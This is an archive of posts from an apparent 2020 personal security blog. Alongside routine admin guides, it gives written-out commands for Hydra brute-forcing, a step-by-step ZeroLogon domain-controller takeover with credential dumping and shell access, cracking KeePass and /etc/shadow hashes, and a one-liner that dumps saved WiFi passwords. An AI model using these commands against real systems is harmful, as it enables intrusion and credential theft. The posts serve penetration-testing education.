2020 - TzuSec.com

Brute Forcing With Hydra

Posted on 2020-12-182020-12-18 by Rickard

What is Hydra:

Hydra is a classic, fast network logon cracker that was created by Van Hauser. It is commonly used as a network logon cracker. The tool is great since it’s both fast and have built-in support for many different protocols.

You can find the code at:
https://github.com/vanhauser-thc/thc-hydra

How to install Hydra:

Hydra comes pre-installed with Kali Linux but if you are running another distributions you can simply install it from source by running the following commands

cd /opt
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
make install

Brute force vs dictionary attack:

The differences between a pure brute force attack and a dictionary attack from a technical point of view are pretty small. A pure brute force attack tests all possible combinations while a dictionary attack uses a word list with just selected combinations, usually default passwords and real passwords from data breaches. Running attacks with word lists are usually the first step to try in hope of finding the password quick. If the password is very strong pure brute force is the way to success.

Hydra requires you to use either a single password or a word list. It’s the same with usernames, either a single username or a word list with usernames.

A great feature that Hydra provides is that you can generate a word list if you are looking for pure brute force. It can be done with parameter -x. I will show you an example in the next section.

Common general parameters with examples:

You can find all parameters with -h but I describe some of the commons ones below.

-l = single username
Example : hydra -l admin

-L = list of usernames
Example: hydra -L /usr/share/wordlists/common-usernames

-p = single password
Example: hydra -p password1

-P = list of passwords
Example: hydra -P /usr/share/wordlists/common-passwords

-s = define port (if non standard for protocol)
Example: hydra -s 1337

-o = write result to a file instead of stdout
hydra -o result.txt

-x = Brute force mode
You can run hydra -x -h to get the full help menu for brute force mode but the the logic is
-x MIN:MAX:CHARSET

So if you for example know that the password requirements are minimum 6 characters and the password needs to contain uppercase, lowercase and numbers you would probably go for:
-x 6:8:aA1
This will generate a list of all possible password that are between 6-8 characters and contains uppercase, lowercase and numbers that will be used for your attack. Example:

hydra -x 6:8:aA1 -l root 192.168.0.1 ssh

Examples:

Some examples on how you can use Hydra for different protocols.

FTP:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.13.37 ftp -o ftp-result.txt

TELNET:

hydra -L /usr/share/wordlists/common-usernames -P /usr/share/wordlists/rockyou.txt 192.168.13.37 telnet

HTTP Forms:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.13.37 http-post-form “/hiddenlogin/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed”

SSH:

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.13.37 ssh -o ssh-result.txt

In this example I used the Hydra machine from TryHackMe.com to demonstrate the example.

I hope this guide was helpful. If you have any questions you can contact me on twitter (@tzusec).
// Rickard

How to Install Terraform in Linux

Posted on 2020-10-172020-10-17 by Rickard

Terraform is an open-source software tool for Infrastructure as Code (IaC). The tool helps users to define and provision a cloud infrastructure with code. This guide will guide you on how to install Terraform on Linux.

You can either install Terraform from pre-compiled binary or you can also compile it from source and that this guide will help you with installing it from source.

The first step is to clone Terraforms repository from github. I prefer to install all my tools to /opt so thats what I do here but you can download to the location you want.

cd /opt
git clone https://github.com/hashicorp/terraform.git

Next we need to move into the terraform folder and compile the binary, to do this you will need to have golang installed, if you don’t have it already you can follow my guide on how to install Golang.

cd terraform
go install

The last step that I recommend you to do is to make sure that terraform is available in your PATH environmental variable.

First check view your PATH with

echo $PATH

Now we just need to move the terraform binary to one of the locations, I choose /usr/local/bin

mv /opt/terraform /usr/local/bin/

Now you have terraform installed. You can verify that is correctly installed by running:

terraform -help 
#or
terraform -version

The last thing I will recommend you to do is to enable tab completion so you can auto complete your terraform commands. You can do it by running the following command.

terraform -install-autocomplete

That’s it. Now you are ready to use this awesome IaC-tool. If you are interested in taking the Terraform Associate certification I recommend you to read my review of the exam.

If you have any questions you can contact me on twitter (@tzusec).
// Rickard

ZeroLogon – How to Exploit and Mitigate

Posted on 2020-10-062020-10-14 by Rickard

Information about vulnerability

The vulnerability I will discuss in this post it the famous ZeroLogon vulnerability(CVE-2020-1472). By exploiting the vulnerability any attacker with network access to domain controller can take complete control of a windows domain very quick and easy.

I will start off by showing you how easy you can exploit the vulnerability. Then I will continue by showing you how you can protect your domain controllers and finally I will show you how you can verify that your domain controllers have the correct fixes in place.

How to exploit the vulnerability

We will use the script by Risksense to exploit the vulnerability. To be able to run it you will need to have the Impacket library installed on your machine. If you don’t have it installed you can simply install it by following the steps below.

cd /opt/ git clone https://github.com/SecureAuthCorp/impacket.git cd impacket/ pip3 install . python3 setup.py install

We will then download the ZeroLogon script from Risksense.

cd /opt
git clone https://github.com/risksense/zerologon.git
cd zerologon/

Now it’s time to exploit. We need the name of the domain, the name of the DC and the IP address. For this example we will use the following information for this made up target:

Name of domain: LETMEIN
Name of DC: SECRET-DC
IP address of DC: 192.168.1.10

Run the script:

python3 set_empty_pw.py SECRET-DC 192.168.1.10

The DC should now have an empty string as its machine password. You can now use a tool of your choice to get out the info you want from the DC. You can for example use secretsdump.py that is included in the impacket library.

Dump credentials:
secretdump.py -just-dc LETMEIN/SECRET-DC\$192.168.1.10

Then press enter when prompted for password since it is supposed to be empty and voila. You should now see the user hashes from the NTDS.DIT.

Now you can easily find a Domain Admin like for example “LETMEIN\Administrator” and use another tool to create a shell. We will use another impacket tool for that, wmiexec.py. So all you need to do is to copy the hash that you got from secretdump.py.

Create shell to domain controller:
wmiexec.py LETMEIN\Administrator@192.168.1.10 -hashes *hashfromsecretdump.py*

You now have a shell on the domain controller. You own it and can do what you want.

Microsofts fix for this vulnerability

So, how can we now mitigate that a hacker exploits this in our own domain? Microsoft released information on how you can fix this. The first step is to install the patch and then set the FullSecureChannelProtection registry key to 1.

Instructions can be found on Microsofts website:
https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

Hopefully you already installed the patches back in august and applied the reg key the same day as Microsoft sent out the information.

How to verify the fix

How can you make sure that you did everything right while applying Microsofts fixes? To test it you can use the Zerologon tester script by Secura. The script also uses Impacket library to test if the vulnerability remains.

How to install:
cd /opt git clone https://github.com/SecuraBV/CVE-2020-1472.git cd CVE-2020-1472 pip install -r requirements.txt

Run the script:
zerologon_tester.py SECRET-DC 192.168.1.10

That’s it, a super critical vulnerability that is extremely easy to exploit. Make sure that you always patch your stuff and do it quickly. ASAP is not enough 🙂

If you have any questions you can contact me on twitter (@tzusec).
// Rickard

How to Backup and Restore phpIPAM

Posted on 2020-10-03 by Rickard

phpIPAM is an awesome IP address management application. I have used it for many years and really like it. In this guide I will show you how you can schedule automatic backups of your IPAM and how you easily can restore the database if something goes wrong.

Schedule automatic backups

Create backup folder
mkdir /mnt/backups/phpipam/db/
Create a file for your credentials
This is done to prevent the credentials to be stored in clear text inside crontab.
touch ~/.msql.cnf
vim ~/.msql.cnf
#[mysqldump]
#user=root #password=*yoursupersecretpassword*
Restrict permissions to file
chmod 600 ~/.msql.cnf
Add to cron – backup the database every day at 23:00
crontab -e
0 23 * * * mysqldump --defaults-file=~/.msql.cnf phpipamdb01 > /mnt/backups/phpipam/db/phpipamdb01_$(date +"%F")_bak.sql

Remove old backups

You can easily remove your old backups (30 days+) by running the command below.
find /mnt/backups/phpipam/db/ -ctime +30 -delete

So what you can do is just adding that command to crontab like I showed you in the example above. But I personally don’t like that approach because if someone changes the date/time on your server there is a risk that all of the backups gets removed and you don’t want to risk that. To make sure that the time is configured correctly you can first verify that NTP is synchronized before you remove the old backup files. (This of course assumes that your NTP servers provides you with the correct time) You can create a simple bash script that will verify that NTP is being synchronized and if it’s not synchronized you will get notified by email:

Create the script
vim rm-old-backups.sh
# #!/bin/bash # #Simple script to remove old phpIPAM backups if NTP i synced. # #By: Rickard Carlsson (@tzusec) # #IF NTP WORKS THEN REMOVE FILES # if (ntpstat | grep -qF "synchronized to NTP server") # then #_____find /mnt/backups/phpipam/db/ -ctime +30 -delete # else # ____mail -s "NTP-error - Backups won't be deleted" rickard@tzusec.com <<< 'NTP wasn't synced so no old backups were removed.' # fi
Make the script executable
chmod +x rm-old-backups.sh
Verify that it works as expected
Manually run the script to make sure that is works as you want.
Add it to cron – remove old backups once every day at 23:30
crontab -e
30 23 * * * /root/rm-old-backups.sh

Restore database

Locate the backup you want to use
ls -l /mnt/backups/phpipam/db/
Restore the database from the backup
mysql -u root -p phpipamdb01 < /mnt/backups/phpipam/db/phpipamdb01_*DATE*_bak.sql

I hope this guide was useful for you. Reach out to me on twitter @tzusec if you have any questions.

Find all non-default services on you Windows machine with Powershell

Posted on 2020-09-012022-10-10 by Rickard

I just released a new video on Youtube where I show you how to use my new Powershell script for getting a list of all services that run on your windows machine that are not default services. You probably won’t need a video instruction on how to run a simple Powershell script but I’m sure it can help someone who is not so familiar with scripts.

The script is not something fancy, just a simple script that will list all non-default services and show you the info you might want to know.

Display Name
State
Start Mode
Status
Process ID
Exe Path
Description

Here is a link to the script:
https://github.com/tzusec/Get-NonDefault-Services

// Rickard

Review – Terraform Associate Certification

Posted on 2020-07-182020-07-18 by Rickard

In this blog post I will give my review on the latest certification I obtained, Hashicorp Terraform Associate. I will start by describing what Terraform is and then give you my take on how to study to pass this exam at your first attempt.

What is Infrastructure as Code (IaC)

If you are not familiar with the concept of IaC I would recommend you to watch this quick explanation.

What is Terraform

Terraform is an open-source software tool for IaC created by HashiCorp. The tool helps users to define and provision a cloud infra the Hashicorp Configuration Language (HCL), or optionally JSON. Three days ago they also released a CDK with Python and Typescript support. Terraform supports most of the big of cloud infrastructure providers.

Exam details

The exam is online based and you will be monitored by a proctor. To be able to do the exam you will need to have a webcam, speakers, a microphone and the zoom client installed.

Exam format: (Link to Sample questions)
- Multiple Choice Questions (MCQs)
- Multiple Answer Questions (MAQs)
- True or False
- Text match questions.
No of questions: 57
Exam duration: 1 hour
Exam cost: The website says $70.50 plus taxes, for me the total cost including taxes were around 90 euro which is very cheap compared to other certifications.

Study plan

In this section I will describe how I recommend that you study for this exam. When talking about certifications people always wonder how long time it takes to study for the exam. The answer to that question is the same as always, it depends on your background, your motivation to learn, how much time you can put into it and how easy you have to learn new stuff.

I had no prior knowledge of IaC before starting to study for this exam and I was able to learn the concepts to pass this exam in around two weeks. I have heard people saying that it is recommended to have 1-2 years of experience with Terraform before taking the exam but I don’t think that is necessary.

If you follow my study plan below I don’t think that you will have any problems with passing the exam.

Official HashiCorp study material
Begin by reading the official study guide.

If you have some experience with Terraform and just want to fresh up your skills before the exam you can read the official exam review instead.
Spin up a Lab environment
I used Microsoft Azure for this since I’m familiar with Azure and the fact that Microsoft offer you a $200 credit to explore Azure for 30 days. I think that most cloud providers offer similar stuff so choose the cloud provider of your taste and spin up a lab environment.

Installation guide and videos on how to get started are included in the study guide but here is a link directly to the installation video.
Video courses combined with lab time
My third recommendation is to watch some video courses. Learning from videos is my personal favorite and I really recommend that you watch the videos and try to follow the instructor in your own lab environment. The best video series I found online was on Youtube and it was created by Will Brock. Really awesome content that I highly recommend you to watch.

Practice exams
When you feel like you understand everything in the videos and have spent some hours in you lab environment I recommend you to do some practice exams so you get a feeling on how the questions will be structured on the real exam. I did some practice exams on Udemy after getting a free voucher from the creator. He shared it in the subreddit /r/Terraform so keep an eye there.

I also found an awesome blog post by a guy named Bhargav Bachina. He goes through each of the exam objectives and have created practice questions based on the objectives. In total there are 250 questions. I really recommend you to read this one.

Summary

When you have completed the steps above you should be ready for the exam. I think that the exam was very fair and I would say that 60min is more than enough time. I think that I had around 20 minutes left when I pressed submit.

In summary I would say that Terraform is a really awesome tool and that the certification was fun. I hope you liked this post. If you have any questions, feel free to send me an email or contact me at twitter. (@tzusec)

// Rickard

Cracking KeePass Database

Posted on 2020-06-07 by Rickard

In this post I will describe how you can crack a KeePass Database file (.kdbx) in an easy way. Or to be correct we are not cracking the DB, we are cracking the password hash.

To demonstrate this I created a new database that I called “SecretDB.kdbx” and our mission will be to find out which master password I chose for the database.

Keepass-DB-file

To be able to crack the hash we will need to extract and save it and that can be done with the John the ripper utility tool “keepass2john“. It comes with Kali Linux so you don’t have to install it.

What you do to extract the hash is really simple, you just run:
keepass2john SecretDB.kdbx

You can also send the output to a file by adding “>” like I did in the screenshot below.

keepass2john SecretDB.kdbx > Keepasshash.txt

keepass2john-screenshot

We now have our hash ready to be cracked. In this example we will try to crack it using a dictionary and John the ripper. I used a modified version of rockyou.txt as dictionary. You can also use other great cracking tools like hashcat but I went with john here.

We run john and specify our custom wordlist with “–wordlist” parameter and then define our hash file.

john --wordlist=rockyou.txt KeepassHash.txt

We then just let it run for some time and as soon as we crack the hash it will be displayed. As you can see in the screenshot we did crack the hash and the password of this SecretDB.kdbx-database was “SuperSecretPassword2020”.

I hope you found this post useful and make sure to not use weak password for your database.

// Rickard

How to crack hashes with John the Ripper – Linux

Posted on 2020-05-03 by Rickard

In this post I will show you how you can crack passwords with John the Ripper. We will start off by collecting the hashes from a linux machine, then use the tool unshadow and at last crack the hashes with John the Ripper.

1 – Collect hashes from a Linux machine
We will start with collecting the hashes from the target machine. We will need both /etc/passwd and /etc/shadow. Save them to your Kali Linux machine, preferably on the desktop. It can be done with the following commands.
cat /etc/passwd > ~/Desktop/passwd.txt

cat /etc/shadow > ~/Desktop/shadow.txt

2 – Combine passwd and shadow with unshadow
Now we need to combine these two files into one. This can be done with the tool unshadow.
unshadow passwd.txt shadow.txt > hashtocrack.txt

3 – Crack with John
Now we are ready to crack the hashes. John can run in different modes. You can use wordlists or straight brute force. The method I will use in this example is wordlist mode since that is the most effective way. Brute forcing takes a lot of time and I recommend you to only use it as a last resort when your wordlists won’t crack the hashes. In this example we define the wordlist to use to the built in rockyou.txt.
john --wordlist=/usr/share/wordlists/rockyou.txt hashtocrack.txt

4 – Show cracked credentials
If you let john run you will be prompted with the credentials as soon as they have been cracked. In this example we can see that the the password for the user SuperAdmin was Password1.

We can also come back at a later time and check the credentials again by defining the unshadowed file and add the parameter –show.

john hashtocrack.txt --show

//Rickard

Grab All WiFi Passwords with just One Line of Code

Posted on 2020-04-112020-04-11 by Rickard

I just released a new video on my Youtube channel. The video will show you how you easily can grab SSID and password to all wireless that your Windows computer remember with a oneliner.

The command first lists all wlan profiles and then saves the SSID to a variable ($name). After that the password is gathered for each SSID and the password is saved to the variable $pass. After that a custom object is created were each SSID and password are being saved to a table.

The command to run in Powershell:
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | % {(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ SSID=$name;PASSWORD=$pass }} | Format-Table -AutoSize

It’s always great to have a oneliner for things like this. I used this method in one of my scripts that I show in the video “Grab login credentials with a BadUSB”.

//Rickard

Grab login credentials with a BadUSB

Posted on 2020-02-29 by Rickard

I just released a new video on my Youtube channel. The video will show you some things that can be done with a BadUSB.

A BadUSB is a device that simulates a HID in form of a keyboard and takes advantage of that the majority of today’s computers blindly trusts all USB-devices. The computer thinks that the device we plug in is a keyboard and that means that anything you we can do with a keyboard we can do with this device, but execute the payloads way faster.

There are many different versions of BadUSB. You can create your own using an arduino board or buy one from Hak5 or Maltronics. In the video I used a Malduino Elite.

//Rickard